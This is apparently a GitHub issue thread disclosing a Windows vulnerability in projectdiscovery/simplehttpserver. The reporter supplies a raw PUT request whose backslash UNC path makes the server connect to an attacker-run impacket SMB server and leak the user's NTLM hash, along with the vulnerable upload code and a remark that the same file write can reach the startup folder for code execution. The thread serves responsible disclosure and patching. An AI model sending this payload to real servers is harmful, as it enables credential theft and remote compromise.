projectdiscovery/simplehttpserver

Security issue (windows) - Abuse `--upload` to steal NTLM-hash | fileWrite | RCE

laluka opened this issue ยท 4 comments

Hello there,
First thing first, congratz for this awesome new tool that will definitely be used a lot and loved! ๐Ÿ’Ÿ

Now the real thing!

Description

If someone uses simpleserver on windows (while would they anyway...), (built with GOOS=windows GOARCH=386 go build cmd/simplehttpserver/simplehttpserver.go), there is a way to abuse the --upload feature to write a file on a network share, and this way steal the user's ntlm hash.
This could then be cracked offline and used to gain access to the server.

Reproduction

The issue can be reproduced with the following request thrown against simpleserver, which will then reach our smb server (here impacket): python examples/smbserver.py -smb2support share /dev/shm

PUT /\\192.168.1.25\share HTTP/1.1
Host: 192.168.1.21:8000
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 6
Expect: 100-continue
Connection: close

dummy

image

Root cause & Mitigations

The path.Base function does not handle backslash, so some more sanitization should be added to take care of this.

image

The vulnerable code lives there:

err = handleUpload(path.Base(r.URL.Path), data)

func handleUpload(file string, data []byte) error {
return ioutil.WriteFile(file, data, 0655)
}

Happy patching, and have a nice day! ๐ŸŒท

Thank you for reporting this @laluka with all the details, we will review this take the required action.

Update: It's in fact a one-shot file write, and leads (with a reboot) to a remote code execution.. ๐Ÿ˜จ

I won't put the whole details here, but it's also possible to write to windows' startup scripts path, and wait for a reboot to get a remote shell.. ๐Ÿ™ƒ

image

@laluka all the security features are enabled with -sandbox flag.

Nice!
Is this flag a default behavior?
I couldn't check yet, but a -no-sandbox flag with a default enabled sandbox would be preferable! :)